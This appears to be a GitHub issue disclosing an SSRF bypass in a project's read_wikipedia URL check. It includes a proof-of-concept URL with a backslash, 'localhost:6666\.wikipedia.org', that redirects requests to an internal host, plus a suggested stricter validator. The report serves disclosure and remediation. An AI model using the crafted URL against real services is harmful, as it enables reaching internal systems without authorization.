SSRF bypass in read_wikipedia #43

@Fushuling

I know this check may be intended as simple format validation rather than a security boundary, but I still want to point out that the URL validation in read_wikipedia can be bypassed, which leads to an SSRF vulnerability.

The function read_wikipedia now relies on _url2title_and_lang for URL translation.

The logic takes the netloc, splits it on dots, and checks that there are at least three parts and that one of them is wikipedia. The expected input is a URL like https://en.wikipedia.org/wiki/Python. The function returns the part before the first dot as lang, which is then interpolated into https://{lang}.wikipedia.org/w/api.php.
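For reference, here is a minimal sketch of what that check sees for a well-formed URL. It only uses urllib.parse from the standard library and makes no network request. The variable names are mine, chosen for illustration.

```python
from urllib.parse import urlparse

url = "https://en.wikipedia.org/wiki/Python"
p = urlparse(url)

# The host is split on dots; the first label is taken as the language code.
parts = p.netloc.split(".")
lang = parts[0]

# Empty path segments are dropped, leaving the "wiki" prefix and the title.
path = [seg for seg in p.path.split("/") if seg != ""]

# The language code is interpolated straight into the API endpoint.
api_url = f"https://{lang}.wikipedia.org/w/api.php"
print(parts, path, api_url)
```

Nothing here constrains what the first label may contain, which is what the bypass relies on.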

In practice, an attacker can construct a URL like https://localhost:6666\.wikipedia.org/wiki/python. It passes every current check, and the returned lang is localhost:6666\ (everything in the netloc before the first dot). Interpolating that value gives https://localhost:6666\.wikipedia.org/w/api.php. requests.get treats \ as /, so the request ultimately goes to https://localhost:6666/.wikipedia.org/w/api.php, resulting in an SSRF attack.

from urllib.parse import urlparse
import requests


def _url2title_and_lang(url: str) -> tuple[str, str]:
    p = urlparse(url)
    print(p)

    netloc = p.netloc.split(".")
    if len(netloc) < 3 or "wikipedia" not in netloc:
        raise RuntimeError(f"{url} is not a valid wikipedia url.")
    lang = netloc[0]

    path = [part for part in p.path.split("/") if part != ""]
    if len(path) != 2 or path[0] != "wiki":
        raise RuntimeError(f"{url} is not a valid wikipedia url.")
    title = path[1]

    return title, lang


# Raw string keeps the backslash literal; a plain "\." is an invalid escape sequence.
url = r"https://localhost:6666\.wikipedia.org/wiki/python"
title, lang = _url2title_and_lang(url)
params = {
    "action": "query",
    "prop": "revisions",
    "rvprop": "content",
    "rvslots": "main",
    "rvlimit": 1,
    "titles": title,
    "format": "json",
    "formatversion": "2",
}
headers = {"User-Agent": "hyperquest/1.0"}
api_url = f"https://{lang}.wikipedia.org/w/api.php"
print(api_url)
req = requests.get(api_url, headers=headers, params=params, timeout=30)
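
One possible way to tighten the check, as a minimal sketch rather than a proposed patch: compare the raw netloc against the parsed hostname so that ports, userinfo, and stray characters are rejected, require the host to be exactly three labels ending in wikipedia.org, and restrict lang to a conservative pattern. The function name url2title_and_lang_strict and the _LANG_RE pattern are my own assumptions, not part of the project, and the pattern may need adjusting to the language codes actually supported.

```python
import re
from urllib.parse import urlparse

# Assumption: language subdomains look like "en", "simple" or "zh-min-nan".
_LANG_RE = re.compile(r"[a-z]{2,12}(-[a-z0-9]+)*")


def url2title_and_lang_strict(url: str) -> tuple[str, str]:
    """Hypothetical stricter variant of _url2title_and_lang."""
    err = RuntimeError(f"{url} is not a valid wikipedia url.")
    p = urlparse(url)
    if p.scheme != "https":
        raise err

    # hostname drops userinfo and port; if it differs from the raw netloc,
    # the URL carries something other than a bare host name.
    host = p.hostname or ""
    if p.netloc.lower() != host:
        raise err

    # Require exactly <lang>.wikipedia.org.
    labels = host.split(".")
    if len(labels) != 3 or labels[1:] != ["wikipedia", "org"]:
        raise err
    lang = labels[0]
    if not _LANG_RE.fullmatch(lang):
        raise err

    path = [seg for seg in p.path.split("/") if seg]
    if len(path) != 2 or path[0] != "wiki":
        raise err
    return path[1], lang


print(url2title_and_lang_strict("https://en.wikipedia.org/wiki/Python"))
```

With this variant the URL from the proof of concept is rejected, because its netloc (localhost:6666\.wikipedia.org) does not equal the parsed hostname (localhost). The trade-off is that hosts such as en.m.wikipedia.org are rejected as well, which may or may not be acceptable here.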